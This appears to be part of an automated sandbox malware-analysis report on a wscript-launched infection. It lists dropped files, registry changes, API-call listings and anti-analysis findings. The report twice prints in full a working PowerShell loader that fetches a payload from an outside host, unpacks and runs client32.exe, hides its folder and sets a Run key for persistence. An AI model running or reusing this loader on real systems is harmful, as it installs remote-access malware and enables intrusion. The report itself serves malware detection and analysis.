                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,10_2_11029BB0
                                Source: PCICL32.DLL.8.drStatic PE information: section name: .hhshare
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBB563BA push E85E4D00h; ret 8_2_00007FFECBB563C9
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBB5882B push FFFFFFCAh; retf 8_2_00007FFECBB5882D
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBB5883B push FFFFFFCAh; retf 8_2_00007FFECBB5883D
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBB5869B push FFFFFFCAh; retf 8_2_00007FFECBB5869D
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBB586AB push FFFFFFCAh; retf 8_2_00007FFECBB586AD
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBB52610 pushad ; iretd 8_2_00007FFECBB6D242
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBDC474C push ds; retf 8_2_00007FFECBDC474F
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE523B1 push FFFFFFCDh; retf 8_2_00007FFECBE523B3
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE5278C push FFFFFFCDh; retf 8_2_00007FFECBE5278E
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE5236B push FFFFFFCDh; retf 8_2_00007FFECBE5236D
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE5131F push edx; iretd 8_2_00007FFECBE51321
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE54B0A push edx; iretd 8_2_00007FFECBE54B0C
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE5226E push FFFFFFCDh; retf 8_2_00007FFECBE52270
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE521BD push FFFFFFCDh; retf 8_2_00007FFECBE521EB
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE52589 push FFFFFFCDh; retf 8_2_00007FFECBE5258B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE5216B push FFFFFFCDh; retf 8_2_00007FFECBE5216D
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE524C2 push FFFFFFCDh; retf 8_2_00007FFECBE524C4
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBFA7937 push ebx; retf 8_2_00007FFECBFA793A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBFA4D5F push eax; retf 8_2_00007FFECBFA4D79
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECC4B0048 push eax; retf 8_2_00007FFECC4B0049
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECC4B7D3E push esi; ret 8_2_00007FFECC4B7D67
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1116FF15 push ecx; ret 10_2_1116FF28
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1116AE09 push ecx; ret 10_2_1116AE1C
                                Source: msvcr100.dll.8.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_6CA97030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,10_2_6CA97030
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,10_2_11128B10
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DIWFEJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DIWFEJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,10_2_11139ED0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,10_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11113380 IsIconic,GetTickCount,10_2_11113380
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,10_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,10_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,10_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,10_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,10_2_11025A90
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,10_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,10_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,10_2_11113FA0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,10_2_11025EE0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,10_2_1115BEE0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,10_2_110241A0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,10_2_11024880
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,10_2_11029BB0
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Contains functionality to detect sleep reduction / modifications
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_6CA891F010_2_6CA891F0
                                Delayed program exit found
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110B86C0 Sleep,ExitProcess,10_2_110B86C0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1635Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8251Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeWindow / User API: threadDelayed 393Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeWindow / User API: threadDelayed 8099Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeEvaded block: after key decisiongraph_10-72181
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeEvaded block: after key decisiongraph_10-76779
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeEvaded block: after key decisiongraph_10-77383
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeEvaded block: after key decisiongraph_10-77515
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeEvaded block: after key decisiongraph_10-77550
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_10-76918
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_10-71837
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeAPI coverage: 7.3 %
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_6CA891F010_2_6CA891F0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 400Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe TID: 5632Thread sleep time: -62000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe TID: 4020Thread sleep time: -39300s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe TID: 5632Thread sleep time: -2024750s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_6CA93130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6CA93226h10_2_6CA93130
